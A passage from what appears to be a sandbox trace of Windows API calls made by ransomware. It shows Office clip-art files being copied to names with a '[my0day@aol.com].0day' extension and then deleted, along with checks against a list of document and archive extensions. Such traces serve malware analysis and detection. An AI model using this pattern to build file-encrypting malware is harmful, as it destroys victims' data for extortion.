Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.273] GetLastError () returned 0x0 [0271.273] ReadFile (in: hFile=0x1fc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x6b0, lpOverlapped=0x0) returned 1 [0271.280] WriteFile (in: hFile=0x3a0, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x6c0, lpOverlapped=0x0) returned 1 [0271.281] ReadFile (in: hFile=0x1fc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.281] WriteFile (in: hFile=0x3a0, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.281] SetEndOfFile (hFile=0x3a0) returned 1 [0271.281] CloseHandle (hObject=0x3a0) returned 1 [0271.281] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.281] SetEndOfFile (hFile=0x1fc) returned 1 [0271.284] CloseHandle (hObject=0x1fc) returned 1 [0271.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.307] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf")) returned 1 [0271.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.423] lstrlenW (lpString=".doc") returned 4 [0271.423] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.423] lstrlenW (lpString=".docx") returned 5 [0271.423] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.423] lstrlenW (lpString=".pdf") returned 4 [0271.423] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.423] lstrlenW (lpString=".xls") returned 4 [0271.423] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.423] lstrlenW (lpString=".xlsx") returned 5 [0271.423] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.423] lstrlenW (lpString=".ppt") returned 4 [0271.423] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.423] lstrlenW (lpString=".zip") returned 4 [0271.423] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.423] lstrlenW (lpString=".rar") returned 4 [0271.423] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.423] lstrlenW (lpString=".bz2") returned 4 [0271.423] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.423] lstrlenW (lpString=".7z") returned 3 [0271.423] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.423] lstrlenW (lpString=".dbf") returned 4 [0271.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.423] lstrlenW (lpString=".1cd") returned 4 [0271.423] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.423] lstrlenW (lpString=".jpg") returned 4 [0271.423] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.424] lstrlenW (lpString=".doc") returned 4 [0271.424] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.424] lstrlenW (lpString=".docx") returned 5 [0271.424] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.424] lstrlenW (lpString=".pdf") returned 4 [0271.424] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.424] lstrlenW (lpString=".xls") returned 4 [0271.424] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.424] lstrlenW (lpString=".xlsx") returned 5 [0271.424] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.424] lstrlenW (lpString=".ppt") returned 4 [0271.424] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.424] lstrlenW (lpString=".zip") returned 4 [0271.424] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.424] lstrlenW (lpString=".rar") returned 4 [0271.424] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.424] lstrlenW (lpString=".bz2") returned 4 [0271.424] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.424] lstrlenW (lpString=".7z") returned 3 [0271.424] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.424] lstrlenW (lpString=".dbf") returned 4 [0271.424] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.424] lstrlenW (lpString=".1cd") returned 4 [0271.424] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0271.424] lstrlenW (lpString=".jpg") returned 4 [0271.424] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.425] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.425] lstrlenW (lpString="BS00445_.WMF") returned 12 [0271.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.429] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=3796) returned 1 [0271.429] CloseHandle (hObject=0x394) returned 1 [0271.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf")) returned 0x20 [0271.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.486] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.486] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.487] GetLastError () returned 0x0 [0271.487] ReadFile (in: hFile=0x388, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0xed4, lpOverlapped=0x0) returned 1 [0271.492] WriteFile (in: hFile=0x3a0, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xee0, lpOverlapped=0x0) returned 1 [0271.493] ReadFile (in: hFile=0x388, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.493] WriteFile (in: hFile=0x3a0, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.493] SetEndOfFile (hFile=0x3a0) returned 1 [0271.496] CloseHandle (hObject=0x3a0) returned 1 [0271.496] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.497] SetEndOfFile (hFile=0x388) returned 1 [0271.670] CloseHandle (hObject=0x388) returned 1 [0271.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.703] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf")) returned 1 [0271.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.703] lstrlenW (lpString=".doc") returned 4 [0271.703] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.703] lstrlenW (lpString=".docx") returned 5 [0271.703] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.703] lstrlenW (lpString=".pdf") returned 4 [0271.703] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.703] lstrlenW (lpString=".xls") returned 4 [0271.703] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.703] lstrlenW (lpString=".xlsx") returned 5 [0271.703] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.703] lstrlenW (lpString=".ppt") returned 4 [0271.703] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.703] lstrlenW (lpString=".zip") returned 4 [0271.703] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.703] lstrlenW (lpString=".rar") returned 4 [0271.703] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.703] lstrlenW (lpString=".bz2") returned 4 [0271.704] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.704] lstrlenW (lpString=".7z") returned 3 [0271.704] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.704] lstrlenW (lpString=".dbf") returned 4 [0271.704] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.704] lstrlenW (lpString=".1cd") returned 4 [0271.704] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.704] lstrlenW (lpString=".jpg") returned 4 [0271.704] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.704] lstrlenW (lpString=".doc") returned 4 [0271.704] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.704] lstrlenW (lpString=".docx") returned 5 [0271.704] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.704] lstrlenW (lpString=".pdf") returned 4 [0271.704] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.704] lstrlenW (lpString=".xls") returned 4 [0271.704] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.704] lstrlenW (lpString=".xlsx") returned 5 [0271.704] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.704] lstrlenW (lpString=".ppt") returned 4 [0271.704] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.705] lstrlenW (lpString=".zip") returned 4 [0271.705] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.705] lstrlenW (lpString=".rar") returned 4 [0271.705] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.705] lstrlenW (lpString=".bz2") returned 4 [0271.705] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.705] lstrlenW (lpString=".7z") returned 3 [0271.705] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.705] lstrlenW (lpString=".dbf") returned 4 [0271.705] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.705] lstrlenW (lpString=".1cd") returned 4 [0271.705] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0271.705] lstrlenW (lpString=".jpg") returned 4 [0271.705] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.705] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.705] lstrlenW (lpString="BS01636_.WMF") returned 12 [0271.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0271.706] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=1874) returned 1 [0271.706] CloseHandle (hObject=0x37c) returned 1 [0271.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf")) returned 0x20 [0271.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0271.707] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.707] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.707] GetLastError () returned 0x0 [0271.707] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x752, lpOverlapped=0x0) returned 1 [0271.737] WriteFile (in: hFile=0x390, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x760, lpOverlapped=0x0) returned 1 [0271.738] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.738] WriteFile (in: hFile=0x390, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.738] SetEndOfFile (hFile=0x390) returned 1 [0271.738] CloseHandle (hObject=0x390) returned 1 [0271.738] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.738] SetEndOfFile (hFile=0x37c) returned 1 [0272.062] CloseHandle (hObject=0x37c) returned 1 [0272.062] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.083] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf")) returned 1 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.125] lstrlenW (lpString=".doc") returned 4 [0272.125] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString=".docx") returned 5 [0272.125] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.125] lstrlenW (lpString=".pdf") returned 4 [0272.125] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString=".xls") returned 4 [0272.125] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.125] lstrlenW (lpString=".xlsx") returned 5 [0272.125] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.125] lstrlenW (lpString=".ppt") returned 4 [0272.125] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.125] lstrlenW (lpString=".zip") returned 4 [0272.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.125] lstrlenW (lpString=".rar") returned 4 [0272.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString=".bz2") returned 4 [0272.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString=".7z") returned 3 [0272.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.125] lstrlenW (lpString=".dbf") returned 4 [0272.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.126] lstrlenW (lpString=".1cd") returned 4 [0272.126] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.126] lstrlenW (lpString=".jpg") returned 4 [0272.126] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.126] lstrlenW (lpString=".doc") returned 4 [0272.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.126] lstrlenW (lpString=".docx") returned 5 [0272.126] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.126] lstrlenW (lpString=".pdf") returned 4 [0272.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.126] lstrlenW (lpString=".xls") returned 4 [0272.126] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.126] lstrlenW (lpString=".xlsx") returned 5 [0272.126] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.126] lstrlenW (lpString=".ppt") returned 4 [0272.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.126] lstrlenW (lpString=".zip") returned 4 [0272.127] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.127] lstrlenW (lpString=".rar") returned 4 [0272.127] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.127] lstrlenW (lpString=".bz2") returned 4 [0272.127] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.127] lstrlenW (lpString=".7z") returned 3 [0272.127] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.127] lstrlenW (lpString=".dbf") returned 4 [0272.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.127] lstrlenW (lpString=".1cd") returned 4 [0272.127] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0272.127] lstrlenW (lpString=".jpg") returned 4 [0272.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.127] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.127] lstrlenW (lpString="CRANINST.WMF") returned 12 [0272.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.148] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=49546) returned 1 [0272.148] CloseHandle (hObject=0x318) returned 1 [0272.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf")) returned 0x20 [0272.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.400] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.400] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.401] GetLastError () returned 0x0 [0272.401] ReadFile (in: hFile=0x3a8, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0xc18a, lpOverlapped=0x0) returned 1 [0272.405] WriteFile (in: hFile=0x390, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xc190, 